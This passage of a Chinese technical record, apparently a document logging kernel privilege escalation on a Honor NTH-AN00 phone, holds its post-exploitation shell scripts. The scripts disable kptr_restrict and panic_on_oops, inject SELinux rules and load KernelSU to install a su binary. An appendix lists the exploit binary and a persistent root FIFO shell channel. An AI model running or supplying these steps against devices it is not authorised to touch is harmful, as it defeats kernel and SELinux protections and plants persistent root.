= "1" ];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"SKIP_KSU=1 -&gt; root 已到手，跳过 insmod（恢复 sysctl 后退出）"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umount /proc/kallsyms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"$kr" &gt; /proc/sys/kernel/kptr_restrict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"$po" &gt; /proc/sys/kernel/panic_on_oops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rootonly &gt; $ST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sync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exit 0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--- load the module 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kmsg_dumper 先起并多等一会，确保 insmod 出事时 oops 已被抓进 kmsg_cap.txt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$D/kmsg_dumper $D/kmsg_cap.txt 2&gt;$D/kmsg_dumper.err &amp;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KPID=$!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sleep 2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"settle 3s before insmod (避开提权余震)"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sleep 3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$D/load_ko $D/kernelsu.ko "allow_shell=1 pristine_policy=$D/pristine_policy"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lrc=$?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"load_ko exit=$lrc"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sleep 2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sync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kill $KPID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if ! grep -q kernelsu /proc/modules 2&gt;/dev/null; then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"!! MODULE NOT LOADED - see kmsg_cap.txt / loadko section above;"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   restoring sysctls, leaving permissive for post-mortem"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tail -n 30 $D/kmsg_cap.txt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umount /proc/kallsyms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"$kr" &gt; /proc/sys/kernel/kptr_restrict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"$po" &gt; /proc/sys/kernel/panic_on_oops 2&gt;/dev/null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echo loadfail &gt; $ST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sync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exit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fi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"=== KernelSU module loaded ==="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grep kernelsu /proc/modules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--- userspace bring-up: real ksud stages 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$D/ksud post-fs-data &gt; $D/stage_postfs.log 2&gt;&amp;1; echo "post-fs-data exit=$?"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$D/ksud services &gt; $D/stage_services.log 2&gt;&amp;1; echo "services exit=$?"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$D/ksud boot-completed &gt; $D/stage_boot.log 2&gt;&amp;1; echo "boot-completed exit=$?"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$D/ksud install &gt; $D/stage_install.log 2&gt;&amp;1; echo "install exit=$?"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ls -la /data/adb/ksud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--- restore system state (before the enforce flip) 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umount /proc/kallsyms 2&gt;/dev/null &amp;&amp; echo "kallsyms unmounted"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"$kr" &gt; /proc/sys/kernel/kptr_restrict 2&gt;/dev/null &amp;&amp; echo "kptr restored=$kr"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"$po" &gt; /proc/sys/kernel/panic_on_oops 2&gt;/dev/null &amp;&amp; echo "panic_on_oops restored=$po"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rm -f $D/fake_kallsyms $D/fake_ksyms.txt $D/pristine_policy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ok &gt; $ST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sync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--- LAST STEP: re-enable enforcing. On FNE this may kill this shell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  (kernel:s0); everything above is already done and flushed. ---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"=== flipping SELinux enforcing (last step; shell may die here) ==="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1 &gt; /sys/fs/selinux/enforce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sleep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"enforce=$(cat /sys/fs/selinux/enforce 2&gt;/dev/null) - chain complete"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"=== chain end $(date) ==="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10.4  scripts/device/ksu_lateload.sh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通过 root 通道执行的 KernelSU 晚加载脚本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#!/system/bin/sh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通过常驻 root FIFO 通道执行的 KernelSU 晚加载脚本。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运行上下文：uid=0，u:r:kernel:s0，SELinux Permissive。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由 chain_hook.sh 建立的 /data/local/tmp/rs.in 通道投递执行。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为什么不用 load_ko + fake kallsyms：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本机实测静态符号表（fne_syms.txt）与运行内核大面积不一致 ——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57154 个符号差 0x30、41699 个差 0x180；更致命的是厂商已把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commit_creds / prepare_kernel_cred 从 kallsyms 中过滤掉，手工补出的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地址是错的，模块 init 一跳就飞（panic）。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官方 ksud（3.3.0）的 insmod 子命令自带运行时符号解析与重定位，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不需要任何手工地址表，因此改用 ksud insmod。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D=/data/local/tmp/ksu_fne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export PATH=/system/bin:/data/local/tmp/ksu_fne:$PATH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"=== KSU late-load start $(date) ==="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"uid=$(id -u) enforce=$(getenforce) ctx=$(cat /proc/self/attr/current 2&gt;/dev/null)"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1) 让 insmod 期间的任何 oops 变成可观察日志，而不是直接重启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po=$(cat /proc/sys/kernel/panic_on_oops 2&gt;/dev/null); echo "panic_on_oops=$po -&gt; 0"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0 &gt; /proc/sys/kernel/panic_on_oops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0 &gt; /proc/sys/kernel/kptr_restrict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2) 快照原始 SELinux 策略（供模块的 selinux_hide 备份使用）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[ -s $D/pristine_policy ] || cat /sys/fs/selinux/policy &gt; $D/pristine_policy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"pristine_policy: $(wc -c &lt; $D/pristine_policy 2&gt;/dev/null) bytes"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3) 先注入 ksu 域所需的 SELinux 规则（late-load 不会自己应用规则，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 规则必须预先存在，否则模块加载后在 enforce 切换时会废掉）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$D/magiskpolicy --apply $D/ksu_rules --live &gt;/dev/null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"magiskpolicy rc=$?"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4) 官方 ksud insmod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"--- ksud insmod ---"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$D/ksud insmod $D/kernelsu.ko "allow_shell=1 pristine_policy=$D/pristine_policy"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"ksud insmod rc=$?"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sleep 3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5) 收尾检查：模块是否真的 Live、su 入口是否装好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"--- /proc/modules ---"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grep kernelsu /proc/modules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"--- su 入口 ---"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ls -l /system/bin/su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"--- su 自检 ---"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/system/bin/su -c id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"KSUTRY_DONE"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5496"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">10.5  scripts/device/restore_enforce.sh</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Microsoft YaHei" w:hAnsi="Arial"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">最后一步：把 SELinux 从 Permissive 切回 Enforcing</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F2F4F7" w:val="clear"/>
        <w:spacing w:after="0" w:before="8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#!/system/bin/sh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最后一步：把 SELinux 从 Permissive 切回 Enforcing。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注意：本脚本由 u:r:kernel:s0 的 root 通道 shell 执行，切换 enforcing 会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杀掉所有 kernel:s0 进程（包括执行它的这个 shell 自己），所以它是整个流程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的最后一条命令 —— 上面所有工作都已落盘。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切换后 root 依然可用：/system/bin/su 走的是 KernelSU 的 u:r:ksu:s0 域，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不再依赖 kernel 上下文，也不再依赖 Permissive。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"before: enforce=$(getenforce)"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1 &gt; /sys/fs/selinux/enforce 2&gt;&amp;1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sleep 1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"after: enforce=$(getenforce)"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F2F4F7" w:val="clear"/>
        <w:spacing w:after="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echo "RESTORE_ENFORCE_DONE"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F2F4F7" w:val="clear"/>
        <w:spacing w:after="80" w:before="0" w:line="250"/>
        <w:ind w:lef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3864"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve">十一、附录：关键文件与路径</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:type="dxa" w:w="9000"/>
        <w:tblBorders>
          <w:top w:val="single" w:color="A6B8CE" w:sz="4"/>
          <w:left w:val="single" w:color="A6B8CE" w:sz="4"/>
          <w:bottom w:val="single" w:color="A6B8CE" w:sz="4"/>
          <w:right w:val="single" w:color="A6B8CE" w:sz="4"/>
          <w:insideH w:val="single" w:color="C9D6E4" w:sz="2"/>
          <w:insideV w:val="single" w:color="C9D6E4" w:sz="2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b/>
                <w:bCs/>
                <w:color w:val="1F3864"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">路径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/data/local/tmp/ksu_fne/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整套预置工具目录（来自 fneroot 应用 assets）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/data/local/tmp/ksu_fne/e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GhostLock / FNE 漏洞利用二进制（215568 字节）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/data/local/tmp/ksu_fne/fne_local.sh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设备端本地化运行脚本（注入 GL_* 策略变量）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/data/local/tmp/ksu_fne/chain_hook.sh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利用成功后的 uid=0 钩子，负责建立 root 通道与抓取 kallsyms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/data/local/tmp/ksu_fne/chain.log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利用链日志（本次三连记录，含 slide mismatch 证据）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/data/local/tmp/ksu_fne/fne_syms.txt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随 APK 附带的静态符号表（11094524 字节）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/data/local/tmp/ksu_fne/kernelsu.ko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KernelSU 内核模块（3935680 字节）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/data/local/tmp/ksu_fne/ksud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KernelSU 用户态工具，版本 3.3.0（uapi: 2）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/data/local/tmp/ksu_fne/magiskpolicy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SELinux 策略注入工具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/data/local/tmp/ksu_fne/pristine_policy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原始 SELinux 策略快照（1612459 字节）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/data/local/tmp/rs.in / rs.out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常驻 root shell 通道（FIFO 输入 / 输出）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/data/local/tmp/real_kallsyms.txt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root 环境下导出的完整 kallsyms（300873 行）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/data/adb/ksud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KernelSU 安装后的常驻工具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/data/adb/ksu/bin/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bootctl、busybox、ksud、resetprop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/system/bin/su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KernelSU 提供的标准提权入口（4892712 字节）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="400"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Microsoft YaHei" w:hAnsi="Arial"/>
          <w:color w:val="999999"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">— 文档结束 —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6"/>
        <w:szCs w:val="16"/>
      </w:rPr>
      <w:t xml:space="preserve">HONOR NTH-AN00 内核提权记录   |   第 </w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:eastAsia="Microsoft YaHei" w:hAnsi="Arial"/>
        <w:color w:val="888888"/>
        <w:sz w:val="16"/>
        <w:szCs w:val="16"/>
      </w:rPr>
      <w:fldChar w:fldCharType="begin"/>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:eastAsia="Microsoft YaHei" w:hAnsi="Arial"/>
        <w:color w:val="888888"/>
        <w:sz w:val="16"/>
        <w:szCs w:val="16"/>
      </w:rPr>
      <w:instrText xml:space="preserve">PAGE</w:instrText>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:eastAsia="Microsoft YaHei" w:hAnsi="Arial"/>
        <w:color w:val="888888"/>
        <w:sz w:val="16"/>
        <w:szCs w:val="16"/>
      </w:rPr>
      <w:fldChar w:fldCharType="separate"/>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:eastAsia="Microsoft YaHei" w:hAnsi="Arial"/>
        <w:color w:val="888888"/>
        <w:sz w:val="16"/>
        <w:szCs w:val="16"/>
      </w:rPr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20"/>
      <w:outlineLvl w:val="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:eastAsia="Microsoft YaHei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80"/>
      <w:outlineLvl w:val="2"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:eastAsia="Microsoft YaHei" w:hAnsi="Arial"/>
      <w:b/>
      <w:bCs/>
      <w:color w:val="3B6EA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dfc20752ec4928c9fb935b39b4b26dfe8a0ae6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2026-10-18T07:30:17.888Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-10-18T07:30:17.889Z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